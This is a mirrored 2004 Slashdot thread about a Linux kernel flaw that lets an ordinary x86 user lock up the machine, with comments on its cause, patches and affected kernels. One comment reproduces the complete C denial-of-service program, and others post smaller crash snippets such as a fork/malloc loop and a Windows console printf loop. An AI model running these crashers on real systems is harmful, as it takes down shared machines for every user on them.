Slashdot Mirror


New Linux Kernel Crash-Exploit discovered

Ant writes "According to a linuxreviews article dated 6/11/2004, there is a nasty bug that lets a simple C program crash the kernel (2.4.18 through 2.6.x reported so far), effectively locking up the whole system. It affects both 2.4.2x and 2.6.x kernels on the x86 architecture. The exploit can be compiled and run with ordinary shell access; root access is not required. Detailed information and source code are available." You need shell access to run this program; it's also worth noting that not *all* flavors are vulnerable. Please read the article for the full details.

38 of 691 comments (clear)

  1. Re:The best way to avoid this bug by Anonymous Coward · · Score: 0, Informative

    RTFA! The bug only works on the x86 platform, so buying a Mac and running Linux on it would get around the bug!
    Parent might be a troll or flamebait, but not off-topic!

  2. if you're running 2.4.25 or 2.4.26 by Anonymous Coward · · Score: 4, Informative

    here's a direct link to the patch.

    not whoring. ;)

    1. Re:if you're running 2.4.25 or 2.4.26 by 13Echo · · Score: 2, Informative

      This crash most definitely works. I tested it on my freshly built 2.6.6 kernel and it locked the whole machine up; just totally freezes it. This was as a standard user.

      I suppose it is not a problem since I don't allow shell access to my machines, but I guess it wouldn't hurt to patch anyway.

  3. The problem appears to be... by Ayanami+Rei · · Score: 5, Informative

    ... that if you trigger a floating point exception inside a signal handler (specifically SIGALRM), the kernel doesn't handle it correctly, hanging the system. It appears to affect both SMP and UP kernels.

    Some questions I have to those who may have been following this:

    Does the crash occur without the syscalls in the signal handler/main process?
    Does the crash occur on SMP machines?
    Does the crash occur with other signals (PIPE, USR1, etc.)
    Does the crash occur on ppc, sparc, etc?

    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
    1. Re:The problem appears to be... by log2.0 · · Score: 2, Informative

      Most of those questions are answered in the article.

      --
      Can your karma go above being Excellent?
    2. Re:The problem appears to be... by Ndiin · · Score: 2, Informative

      I can confirm that this does occur on SMP systems, but it requires two instances. The first run of the program locks up one of the CPUs completely, and cannot be killed. The second kills the entire machine.

      This is on 2.4.25

      -- Ndiin

  4. Real crash.txt info and fix by bigdady92 · · Score: 2, Informative

    #include <sys/time.h>
    #include <signal.h>
    #include <unistd.h>

    /* SIGALRM handler: saves and restores the x87 state around a write(). */
    static void Handler(int ignore)
    {
        char fpubuf[108];   /* size of the x87 FSAVE area */
        __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
        write(2, "*", 1);
        __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
    }

    int main(int argc, char *argv[])
    {
        struct itimerval spec;
        signal(SIGALRM, Handler);
        /* fire SIGALRM every 100 microseconds */
        spec.it_interval.tv_sec=0;
        spec.it_interval.tv_usec=100;
        spec.it_value.tv_sec=0;
        spec.it_value.tv_usec=100;
        setitimer(ITIMER_REAL, &spec, NULL);
        while(1)
            write(1, ".", 1);

        return 0;
    }

    Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works from any normal user account; root access is not required. This exploit has reportedly been used to take down the servers of several "lame free-shell providers" (this is illegal in most parts of the world and strongly discouraged).

    This code only works on x86 Linux machines. This code does not compile (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This doesn't affect NetBSD Stable.

    Check your own system yourself if you are wondering whether this affects you. Better safe than sorry. Assume it will crash; sync (or even unmount) your file systems before testing. If your system is a production server with 1000 online users, do not test this code on that box.

    How to protect yourself

    The last few days were frustrating. Compiling a large number of different kernel versions just to find that gcc crash.c -o evil && ./evil halts the system is quite dull. I hoped some kernels would be unaffected because 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernel versions die when evil is executed.

    The Linux Kernel mailing list is found to the right of this article. You may find solutions there not mentioned on this page. The author does subscribe and plans to post (better) solutions here as they appear.

    Patch for 2.4.2x (vanilla) Kernels
    Stian Skjelstad mailed me a working patch for 2.4 kernels.

    2.4.26

    I applied it, confirmed that it works with the vanilla 2.4.26 kernel and made a diff (diff -ur linux-2.4.26/kernel/signal.c linux-2.4.26-x/kernel/signal.c > signal.c-2.4.26.patch.txt). (signal.c-2.4.26.patch.txt)

    1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
    2. Download linux-2.4.26.tar.bz2 from your local Linux Kernel Mirror
    3. Unpack the kernel source and make a symbolic link:
    * cd /usr/src/
    * tar xfvj linux-2.4.26.tar.bz2
    * ln -s linux-2.4.26 linux
    4. Download the patch for 2.4.26: signal.c-2.4.26.patch.txt
    5. Apply the patch
    * patch -p1 -d /usr/src/linux-2.4.26 signal.c-2.4.21.patch.txt) is tested and works for Kernel 2.4.21 (vanilla).

    1. Get a vanilla 2.4.21 kernel and install it.
    2. Apply the patch
    * patch -p1 -d /usr/src/linux-2.4.26 2.4.26-rc3-gentoo.

    I have no idea why this kernel version is safe from this exploit. It just is. This kernel patch set returns Floating point exception instead of locking the system when evil is executed.

    This kernel can be used on any Linux system. It does not require any Gentoo-only tools.

    1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
    2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
    3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka 2.4.26_pre5:
    * wget http://re.a.la/gs (2,2M)
    4. Unpack the 2.4.25 kernel source:
    * cd /usr/src/
    * tar xfvj linux-2.4.25.tar.bz2
    5. Apply the Gentoo patchset:
    * patch -p1 -d /usr/src/linux-2.4.25 "EXTRAVERSION = -rc3-gentoo"
    8. Configure your kernel
    * Using your old config: cp /usr/s

    --
    Wheel of Time: Book by Book and Sumview (summary review) Bigdady92 style: http://bigdady92.blogspot.com/
  5. I read the article too, I'm an idiot. by Ayanami+Rei · · Score: 4, Informative

    The article says it affects x86 (and x86-64) only.

    So itanium, ppc, etc. are safe. But my other questions still remain.

    Note that the person who reported the bug thought they were triggering a gcc bug. As it turns out, he munged his FPU assembly instructions.
    The GCC people rightly told him to contact the lkml... it's definitely an exception handling issue.

    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
  6. You do NOT need shell access by Anonymous Coward · · Score: 3, Informative

    This can be executed on any webhost with ftp access and a cgi-bin.

  7. Re:Fixed quickly. by kaiidth · · Score: 5, Informative
    Patch is here on LKML. And of course it is on the original exploit page too.

    Here is the LKML discussion thread on the subject. It's an interesting bug, briefly summarised by Matt Mackall as follows:

    The example code's bogus
    asm is generating an FPU fault in frstor in its signal handler, that's
    bumping us into math_error -> force_sig_info ->
    specific_send_sig_info. Then we hit:

    if (LEGACY_QUEUE(&t->pending, sig))

    which decides we don't need to send the signal after all and we bail
    all the way back out and recurse.


    So there's a bit of a massive problem with FPU exception handling, which didn't come to light before. Wheee. Fun.
  8. Re:Who has shell access? by Ctrl-Z · · Score: 2, Informative

    Universities.

    --
    www.timcoleman.com is a total waste of your time. Never go there.
  9. Older gcc-versions also vulnerable by kghougaard · · Score: 3, Informative

    FYI... My RH7.3 with gcc 2.96 and a 2.4.20 kernel is also vulnerable.

    --
    He, who dies with the most toys, wins
  10. Re:Who has shell access? by afidel · · Score: 2, Informative

    I have shell on my old dialup ISP's Sun machines, have for over a decade now. Many shared webhosting farms run on Linux on x86 and if you have CGI you basically have shell since you can run arbitrary code. Also any place that does development work under Unix probably gives their developers shell access (duh). So I would say there are a lot of places that give more than just the inner circle monks of IT shell access.

    --
    There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
  11. Re:There's a big difference... by AntiChris · · Score: 2, Informative
    You know why? They don't care, they don't want to "break" anything, or they don't even know that the little icon in their taskbar is any different from their 1000 other ones in the tray.

    That's right... they don't want to break the CometCursor, KaZaa, download managers, money savers, and other malware etc that are in the tray... then they wonder why their computers always crash and blame it on Microsoft.
    I work as an IT Director for a real estate company and as a tech for Best Buy and at BB we've started a tally for the highest number of malware found by AdAware... I think the highest was well over 5000!!! Needless to say we recommended a restore O_o
    --
    From 0 to drunk in $20
  12. Uh oh... by Anonymous Coward · · Score: 1, Informative

    Beware of patch.

    It could be another Linux Kernel 2.4.11

  13. Not all... (read for more info) by Ayanami+Rei · · Score: 2, Informative

    The article doesn't attempt to explain anything.

    (Someone please correct me if I have this wrong)

    After poking around in the LKML, I've mostly figured it out.
    The kernel wasn't handling floating point exceptions correctly in the signal handler. The problem is that if the exception is triggered by the LAST instruction in the handler, the kernel attempts to deliver it to a signal context which no longer exists. The same thing was happening with execve... if you triggered it right before the execve syscall, the application context would be destroyed, and the pending exception would be pointing to a nonexistent instruction. The exception handler would jump off into space trying to deliver SIGFPE...

    So they changed __clear_fpu (which is called when doing an initial switch back to user space [I think]) to clear any pending FPU exceptions, because there was no way they could be handled anyway.

    Missing an FPU exception doesn't sound so bad. I think someone was posting a better solution, which would attempt to handle it the right way... (I didn't really follow the more extensive patch, anyone care to explain?)

    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
  14. Re:There's a big difference... by the_mad_poster · · Score: 4, Informative

    Yea, the only difference is that in OSS the steps are usually covered in about a third the time.

    This hit the kernel-list dated 2004-06-09 21:02:57 . It is now 2004-06-14 09:41:12 in my neck of the woods, and it is patched. The last update mentioned on the article's page is yesterday. It would appear the patch was available in no more than 4 days. It takes more than four days for a lot of vendors just to look at the goddamn report. Then they spend the next week hoping it goes away on its own. Then they ignore the follow ups. Two months later when the submitter has had enough, they go to FULL DISCLOSURE and the vendor gets pissed off and starts attacking the person who reported it for not giving them enough time to write a patch they haven't even started on. Then they spend another month making lousy excuses for why it's not a serious issue and half-assed suggestions of what you can turn off to avoid the problem. Finally, after about four months of hand wringing, press releases, and general bullshit, you might get a patch. If you're lucky, it won't require you to start the process over again by introducing a brand new vulnerability. If you're lucky.

    There's a huge difference here. The Linux folks jumped up and solved the problem. They didn't sit around pissing on their hands for months and making excuses like a lot of vendors do.

    --
    Alito: A vote for Alito is a punch in the eye to put that bitch back in her place!
  15. Re:There's a big difference... by Fizzol · · Score: 2, Informative

    In defence of the article "lame free-shell provider" is presented in quotes, it's not the website or the author using the term. It's a quote from the perpetrator. There's no connection to open source.

  16. Re:UML? by bluelip · · Score: 4, Informative

    Talked about on the mailing lists.

    http://marc.theaimsgroup.com/?l=linux-kernel&m=108695598318818&w=2

    Says session just dies. Host is OK.

    --

    Yep, I never spell check.
    More incorrect spellings can be found he
  17. Re:In case of slashdotting by Anonymous Coward · · Score: 1, Informative
    #include <stdio.h>

    int main() {
    for(;;) printf("\t\t\b\b\b\b\b");
    }
  18. Re:There's a big difference... by Anonymous Coward · · Score: 2, Informative

    Doesn't crash my win2k pro box. I'm all for slagging off MS, but let's do it with real bugs, eh?

  19. Re:There's a big difference... by Allen+Zadr · · Score: 5, Informative
    A well patched system, Linux or Windows, doesn't need a firewall.

    "WHAT YOU SAY!?"

    I run a corporate network without a firewall. Every time a major issue comes around and destroys every freaking company around me, I go by with maybe two systems affected. Why? I stay up-to-date on all patches, and I keep relatively SANE security policies in place.

    A firewall is a lot less necessary than firewall vendors would have you believe. My experience is that firewalls breed a false sense of security. Someone goes home over the weekend with a laptop - and comes back with a zombie virus/worm/etc. that goes and infects everything while the IT department is "taking their time" evaluating a security update for a month (I do 24 hour tests).

    Why not firewall, is the other thing I hear. Mostly, it's so that every one of my systems can be an internet service provider. That's what the internet is about. Enabling users to say, hey - I've got that file right here on my local FTP, come get it. Here, log onto my VNC desktop, and I'll show you.

    Firewalls create industries like WebEx. Because technology has come from 'wow, I didn't know you could do that,' to, 'I didn't know you could do that because I'm firewalled.'

    Finally, "It doesn't happen very often," quite clearly means that it has happened. Call it pre-teen style bitching if you will, but a lawsuit should never have been threatened (AFAIK, a lawsuit never actually went to court). If someone finds a vulnerability, full disclosure should not be the only way to get Microsoft to take you seriously. My teen years are LONG behind me, maybe I'm just sick of having to deal with Microsoft's crap since Windows for Workgroups 3.11 (when the problems started for me).

    --
    Kinetic stupidity has a new brand leader: Allen Zadr.
  20. IGNORE above ... new info. by Ayanami+Rei · · Score: 4, Informative

    God I wish I could edit posts.

    The issue isn't that the context is gone... the issue is that the kernel is executing a waiting FPU instruction, i.e. "fwait", on returning from a context that flushes a user thread (i.e. return from signal handler, syscall after execve). That triggers the FPE, except the kernel isn't set up to handle FPEs properly from kernel space in this case. The problem is that the TS flag is set because it's switching tasks, so it receives a different exception, trap 7 (device_not_available). The purpose of that exception is to signal the kernel that a newly created process wants the FPU. So it attempts to set up the FPU... which ends up calling __clear_fpu again... heh... and the original exception isn't cleared yet... whoops.

    What's really weird is I found this document, which details the potential problems of trying to use the FPU in an interrupt handler in the Linux kernel.

    They brought up the potential of triggering this EXACT PROBLEM... quote "endless trap 7 activation"... only in this case they're talking about writing an interrupt routine, not returning from a signal handler. Still, they already discovered this misbehavior...

    Well, you can't really call it that, though. It was sort of by design (to make task switching faster). But the thing is you have to be ABSOLUTELY SURE that you never raise an FPE when TS is set, and you're NOT a user thread. That's what gets you burned here.

    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
  21. Re:Fixed quickly. by Hiro+Antagonist · · Score: 3, Informative

    The thing about Windows bugs is that many of them are remotely exploitable by unprivileged users; in order to exploit bugs like this, and in fact any root compromise that I know of, you need to first get a shell on the machine. Much harder than throwing up a web page or sending out a trojaned email.

    --
    I Hit the Karma Cap, and All I Got Was This Lousy .sig.
  22. Re:OT: Bugtraq auto-unsubscribe? by Anonymous Coward · · Score: 1, Informative

    You are probably refusing "virus-infected" messages.

  23. A good time to disable compiler access by nacs · · Score: 2, Informative
    This is definitely not a fix for this exploit, but if you're running a server where you have given shell access to a few people (like on a hosting server), this is as good a time as any to limit compiler access.

    Here's how:

    Add compiler group:
    /usr/sbin/groupadd compiler

    Move to correct directory:
    cd /usr/bin

    Make most common compilers part of the compiler group
    chgrp compiler *cc*
    chgrp compiler *++*
    chgrp compiler ld
    chgrp compiler as

    Set permissions
    chmod 750 *cc*
    chmod 750 *++*
    chmod 750 ld
    chmod 750 as

    To add users to the group, modify
    /etc/group
    and change
    compiler:x:123:
    to
    compiler:x:123:username1,username2
    '123' will be different on your installation.

    Again, don't think this is a fix for the exploit. It's just a good little step in securing a box.
    --
    "I filter at +6, and have yet to miss out on an important comment." (#822545)
  24. Re:There's a big difference... by Anonymous Coward · · Score: 2, Informative

    Yeah, well, the so-called "tin-foil-hat crowd" has noticed the fact that autoupdate on windows XP is crap. Have you ever compared the list of updates it gets for you, to the list on the actual windows update site? I've had cases where there were 2-3 more critical updates that autoupdate didn't download.

    It also doesn't help that it won't autoupdate service packs, causing everything after the service pack to just not show up, without autoupdate even notifying you that there is a service pack to manually download and install.

    And way back when the slammer worm was big news, autoupdate got the patch to me the week after it made /. (complete with people griping that the patch was out "months ago"). And then got the patch again every day for the next 4 days.

    Tin foil and conspiracy theory has nothing to do with the fact that I no longer trust autoupdate.

  25. Re:There's a big difference... by zsau · · Score: 4, Informative

    Didn't work for me. I just get a white screen in the middle of the command prompt with a purple border that says in purple 0: PING 192.168.0.7. Pressing Enter runs ping a couple times.

    I'm far from a Windows fanboy. I use Linux almost all the time... I just happened to have a Windows box on my network atm.

    --
    Look out!
  26. Re:Must be ANSI SLASHDOT C by Anonymous Coward · · Score: 1, Informative
    argc and argv are not necessary to be ANSI. EXIT_SUCCESS is defined as:
    #define EXIT_SUCCESS 0
    Thus, returning zero is perfectly acceptable.

    Where does it say in the standard that you have to explicitly call EXIT_SUCCESS?
  27. Re:This is another reason why C should be deprecat by rendler · · Score: 3, Informative
    From the perlfaq1 man page:
    What's the difference between "perl" and "Perl"?

    One bit. Oh, you weren't talking ASCII? :-) Larry now uses "Perl" to signify the language proper and "perl" the implementation of it, i.e. the current interpreter. Hence Tom's quip that "Nothing but perl can parse Perl." You may or may not choose to follow this usage. For example, parallelism means "awk and perl" and "Python and Perl" look OK, while "awk and Perl" and "Python and perl" do not. But never write "PERL", because perl is not an acronym, apocryphal folklore and post-facto expansions notwithstanding.
    Some people are pedantic about these sorts of things. Personally my only spelling pet peeve is seeing people use 'alot'.
    --

    *shrug*
  28. FYI suse 9.1 not vulnerable by sloanster · · Score: 4, Informative

    Granted, this crashme program, which requires local shell access, does seem to work in some cases.

    However, it does not do so on suse linux 9.1 - it creates an unkillable process, but the system continues to run normally.

  29. Re:There's a big difference... by MachineShedFred · · Score: 2, Informative

    As for your Win2k 'sploit, I call bullcrap. Doesn't work, but a nice command history comes up, so I'll thank you for that tip.

    Oh, and saying that local exploits aren't taken seriously is both a major understatement, and a not-so-major problem. After all, you can fix all the Denial-of-Service exploits you want, but if someone has local access to the machine, they can always pull out the power cord.

    That is not easily fixed with an OS patch. Never underestimate the use of a heavy door and good locks.

    --
    Slashdot still doesn't support Unicode after it was added to the HTML standard in 1997.
  30. Re:Not news. by multi+io · · Score: 3, Informative
    There are 1,001 ways to crash a linux kernel with access to a shell. Save some keystrokes and give:
    for(;;)
    {
    malloc(1);
    fork();

    }

    help ulimit

  31. RHEL3 doesn't crash by photon317 · · Score: 1, Informative


    Tested their code on Redhat ES 3.0 with all current updates applied (2.4.21-15.ELsmp - they haven't released any new kernel updates specific to this problem). The process will suck up a cpu spinning in a tight loop, and is unkillable (even as root with kill -9), but it does not crash the system.

    Redhat seems to have different code in signal.c around the area the signal.c patch mentions, but does not have the i387.h patch.

    --
    11*43+456^2
  32. [CORRECTION] Re:RHEL3 doesn't crash by photon317 · · Score: 4, Informative


    My test was on a dual P4 (hyperthreading). Running a single instance of the code only locked a single cpu. I just played with it again, and running 4 instances locked the box. So RHEL3 is vulnerable, and a correct description of the problem is that the exploit locks up 1 cpu in an endless loop that cannot be stopped. For systems with multiple CPUs, you have to do this once for each cpu (twice for each physical cpu if hyperthreading) in order to lock the whole box up.

    --
    11*43+456^2
  33. Re:nonzero: It's not just for game thory anymore! by grahamlee · · Score: 2, Informative
    I was using the term in a sociological context, bub.

    The name's grahamlee. I was using a word from the english language and taking it to mean that which is its accepted meaning. It's even written as such in the dictionaries.

    BTW, since you're so well versed in engineering and it's terminology I'm sure you know that all computers built since the dawn of time (computing) to this day are said to use a "Von Neumann architecture"?

    That's a load of rubbish; all computers since the dawn of time have certainly not been exclusively von Neumann computers (as distinct from von Neumann machines, of course). Note all of the computers that employ the Harvard architecture. And I doubt you can conveniently ignore those unless you never ever intend to use a DSP (ever). The Harvard architecture is named after the Harvard Mark I (a.k.a. IBM ASCC), and one of its programmers was a certain Grace Hopper. She went on to big things, you know.

    Von Neumann was a mathematical genius, the father of the modern computational model and the original pioneer of game theory.

    You mean Neumann János? [I'm not happy that a paid-for title should necessarily be honoured.] I wonder whether he was able to see the word 'nonzero' written down without trying to invent a new meaning for it....probably. Anyway, the achievements or otherwise of a Hungarian mathematician have little bearing on your version of the word nonzero's definition, which of course comes from the Old French / Latin prefix "non-" and the Arabic "çifr". Not that your definition isn't necessarily valid in some field, I'm sure it is. It's just that the previous (c. 1879) definition already has a lot of inertia everywhere else, because people know that that is what the word means.

  34. Re:In case of slashdotting by Transcendent · · Score: 2, Informative

    That actually doesn't work anymore... unless you haven't patched Win2k?

    Also... that's a problem with printf() mainly... not windows.